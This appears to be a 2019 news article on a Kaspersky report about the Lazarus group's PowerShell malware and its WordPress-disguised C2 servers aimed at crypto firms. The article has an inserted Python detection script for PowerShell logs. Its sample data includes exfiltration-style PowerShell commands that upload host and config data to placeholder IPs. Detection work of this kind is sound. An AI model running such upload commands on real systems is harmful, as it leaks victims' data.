Report: Lazarus Hacker Group Adopts New Methods, Continues Targeting Crypto

Published at: March 27, 2019

Alleged North Korea-sponsored cybercrime group Lazarus is still targeting cryptocurrencies and adopting new tactics, according to a new report from cybersecurity and anti-virus company Kaspersky Lab published on March 26.

The report reveals that the allegedly state-sponsored hacker group Lazarus has been running a new operation since last November, in which the group uses PowerShell to manage and control its Windows and macOS malware. The Lazarus team has reportedly developed custom PowerShell scripts that interact with malicious command-and-control (C2) servers and execute commands issued by the operator.

The C2 server scripts, in turn, are named to look like WordPress files and files from other open source projects. Once a control session with the server has been established, the malware can download and upload files, update its own configuration and collect basic host information, among other actions.
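The behaviour described above (PowerShell talking to C2 scripts disguised as WordPress files, uploading host information) is something a defender can hunt for in PowerShell script-block logs. The following is an added detection example, not code from the Kaspersky report or the Lazarus tooling; it assumes ScriptBlockLogging (Event ID 4104) is enabled and runs over constructed sample script blocks with documentation-range IP addresses.

```python
import re

# Constructed sample script-block texts (not real telemetry), in the style of
# what PowerShell ScriptBlockLogging (Event ID 4104) records per script block.
SAMPLE_EVENTS = {
    1: "Get-ChildItem C:\\Users -Recurse | Measure-Object",
    2: "$c = New-Object Net.WebClient; $c.UploadString('http://203.0.113.10/wp-content/plugins/wp-config.php', (Get-ComputerInfo | ConvertTo-Json))",
    3: "Invoke-WebRequest -Uri 'https://www.example.org/wp-content/themes/style.css' -OutFile style.css",
    4: "Invoke-RestMethod -Uri 'http://198.51.100.7/wp-includes/js/jquery.php' -Method Post -Body (Get-Content config.json)",
}

# Indicators derived from the reported tradecraft: a PowerShell web-transfer
# primitive, a URL whose path imitates WordPress, a bare-IP host (a real
# WordPress site is normally reached by hostname) and an outbound upload/POST.
WEB_PRIMITIVE = re.compile(r"Net\.WebClient|Invoke-WebRequest|Invoke-RestMethod|Download(String|File)|Upload(String|File)", re.I)
URL = re.compile(r"https?://([^/'\"\s]+)(/[^'\"\s]*)?", re.I)
WP_PATH = re.compile(r"/wp-(content|includes|admin)/|/wp-[\w-]+\.php", re.I)
IP_HOST = re.compile(r"^\d{1,3}(\.\d{1,3}){3}(:\d+)?$")
UPLOAD = re.compile(r"Upload(String|File)|-Method\s+Post", re.I)

def score_script_block(text):
    """Return (score, reasons) for one logged script block; each matched indicator adds one point."""
    reasons = []
    if WEB_PRIMITIVE.search(text):
        reasons.append("web transfer primitive")
    for m in URL.finditer(text):
        host, path = m.group(1), m.group(2) or ""
        if WP_PATH.search(path):
            reasons.append(f"wordpress-style path {path}")
        if IP_HOST.match(host):
            reasons.append(f"bare-IP host {host}")
    if UPLOAD.search(text):
        reasons.append("outbound upload/POST")
    return len(reasons), reasons

def flag_events(events, threshold=3):
    """Map event id -> reasons for every script block scoring at or above the threshold."""
    flagged = {}
    for eid, text in events.items():
        score, reasons = score_script_block(text)
        if score >= threshold:
            flagged[eid] = reasons
    return flagged

if __name__ == "__main__":
    for eid, reasons in flag_events(SAMPLE_EVENTS).items():
        print(f"event {eid}: {', '.join(reasons)}")
```

A legitimate download of a WordPress theme asset from a named host (event 3) scores below the threshold, while script blocks that POST host data to a WordPress-looking path on a bare IP (events 2 and 4) are flagged; tune the indicator list and threshold to your own environment.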

Kaspersky notes that the hackers are still targeting systems involved in the cryptocurrency and fintech industries, and advises players in those sectors to exercise caution:

“If you’re part of the booming cryptocurrency or technological startup industry, exercise extra caution when dealing with new third parties or installing software on your systems [...] And never ‘Enable Content’ (macro scripting) in Microsoft Office documents received from new or untrusted sources…”

As previously reported, Lazarus is purportedly responsible for $571 million of the $882 million in cryptocurrency that was stolen from online exchanges from 2017 to 2018, almost 65 percent of the total sum. Out of 14 separate exchange breaches, five were attributed to the group, among them the industry record-breaking $532 million NEM hack of Japan’s Coincheck.

Earlier in March, Cointelegraph reported that North Korea has reportedly amassed $670 million in fiat and cryptocurrencies by conducting hacking attacks, wherein the hackers attacked overseas financial institutions from 2015 to 2018 and purportedly used blockchain “to cover their tracks.”
